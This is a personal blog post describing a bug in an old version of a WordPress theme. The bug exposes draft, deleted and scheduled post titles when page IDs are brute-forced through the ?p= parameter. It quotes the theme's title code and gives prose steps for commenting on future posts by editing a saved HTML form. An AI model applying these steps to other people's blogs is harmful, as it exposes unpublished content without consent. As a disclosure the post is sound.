tmacuk

So last night I received a call from ethicalhack3r saying that bug I had found should work in any blog because the Permalinks are still available even if you chose a different one. So what we were searching for was ?p= and then a random page number that had a post on it that wasn’t published.

He then wrote a script which would brute force the page numbers so that we could find them in any site. Not only did this show up all the drafts that I had at the moment, but also the posts that I had though I had deleted. The posts that had been deleted and never shown i.e. drafts, could be seen by a member on the forum. However future posts could not be, but the title could be seen.

We started to run this script against other people’s blogs to see if it worked for them, and it didn’t. So we came to the conclusion that it was my blog that had something wrong. I removed all my plug-ins and got ethicalhack3r to try again and it still worked. So I was getting really frustrated that it was something that I had done.

I then checked my theme and realised that there was an update. So I updated and it still worked! Ethicalhack3r then made a test blog using the scripts available through our host and installed the latest version of my theme. It wasn’t working now. We came to the conclusion that it must be the theme, but why did it work on my site and not on the test?

We compared source code and found the following -

<title><?php if (is_home () ) { bloginfo('name'); echo " - "; bloginfo('description');
} elseif (is_category() ) {single_cat_title(); echo " - "; bloginfo('name');
} elseif (is_single() || is_page() ) {single_post_title(); echo " - "; bloginfo('name');
} elseif (is_search() ) {bloginfo('name'); echo " search results: "; echo wp_specialchars($s);
} else { wp_title('',true); }?></title&gt

More specifically we were looking for this -

else { wp_title('',true);

All this is doing is telling the page to replicate the title of the post inside the title tags. This can found in the header.php

We then went to the website that the theme came from looking for a change log but couldn’t find one and we found that he hadn’t kept one. So all I know is that I was running > version 1.9.9.

A clean install of the theme would fix this, but the update doesn’t change this part of the code. After a few Google searches we found that a lot of people were using the old version of the theme and were vulnerable to the attack that I had found.

Another interesting thing is that you can post a comment to the future post, I currently have two comments schdualed for 01/01/2011 – the first one is from ethicalhack3r saying “Muhahahaha” & and the second one from Tom Sellers, someone who works on Nmap, said “Test post to Marty McFly.”

This is how it is done -

Open any of your blog posts.  Save a copy of the HTML document to local
disk.  Open that file with an editor and replace all instances of the
post id (mine was copied from post 122, http://tmacuk.co.uk/?p=122)
with the post id of the future post, in your case 153.  It shows up in
a few formats (p=122, value="122, value='122) so just find and replace
the number.

Save the document and then open it.  Enter a comment and post it. It should
show up on your future post, McFly    The captcha is a full link to the
captcha service so its live and works, BONUS!

So if you wanted to know why I have changed my theme there you go. I am guessing that you can still comment to that post now, however you wouldn’t be able to find it because that bug isn’t available on my site no more.

So the bug went a lot deeper than I first thought. I must thank ethicalhack3r and Tom Sellers for giving me some help last night, if it wasn’t for them this post would have probably taken a week to bring out and I probably would be using the same buggy theme.

Here is a link to the theme – http://wordpress.org/extend/themes/pixel. Remember a clean install will not produce the bug, so if you want to try it out, you need to edit the code to what I have talked about today.

tmacuk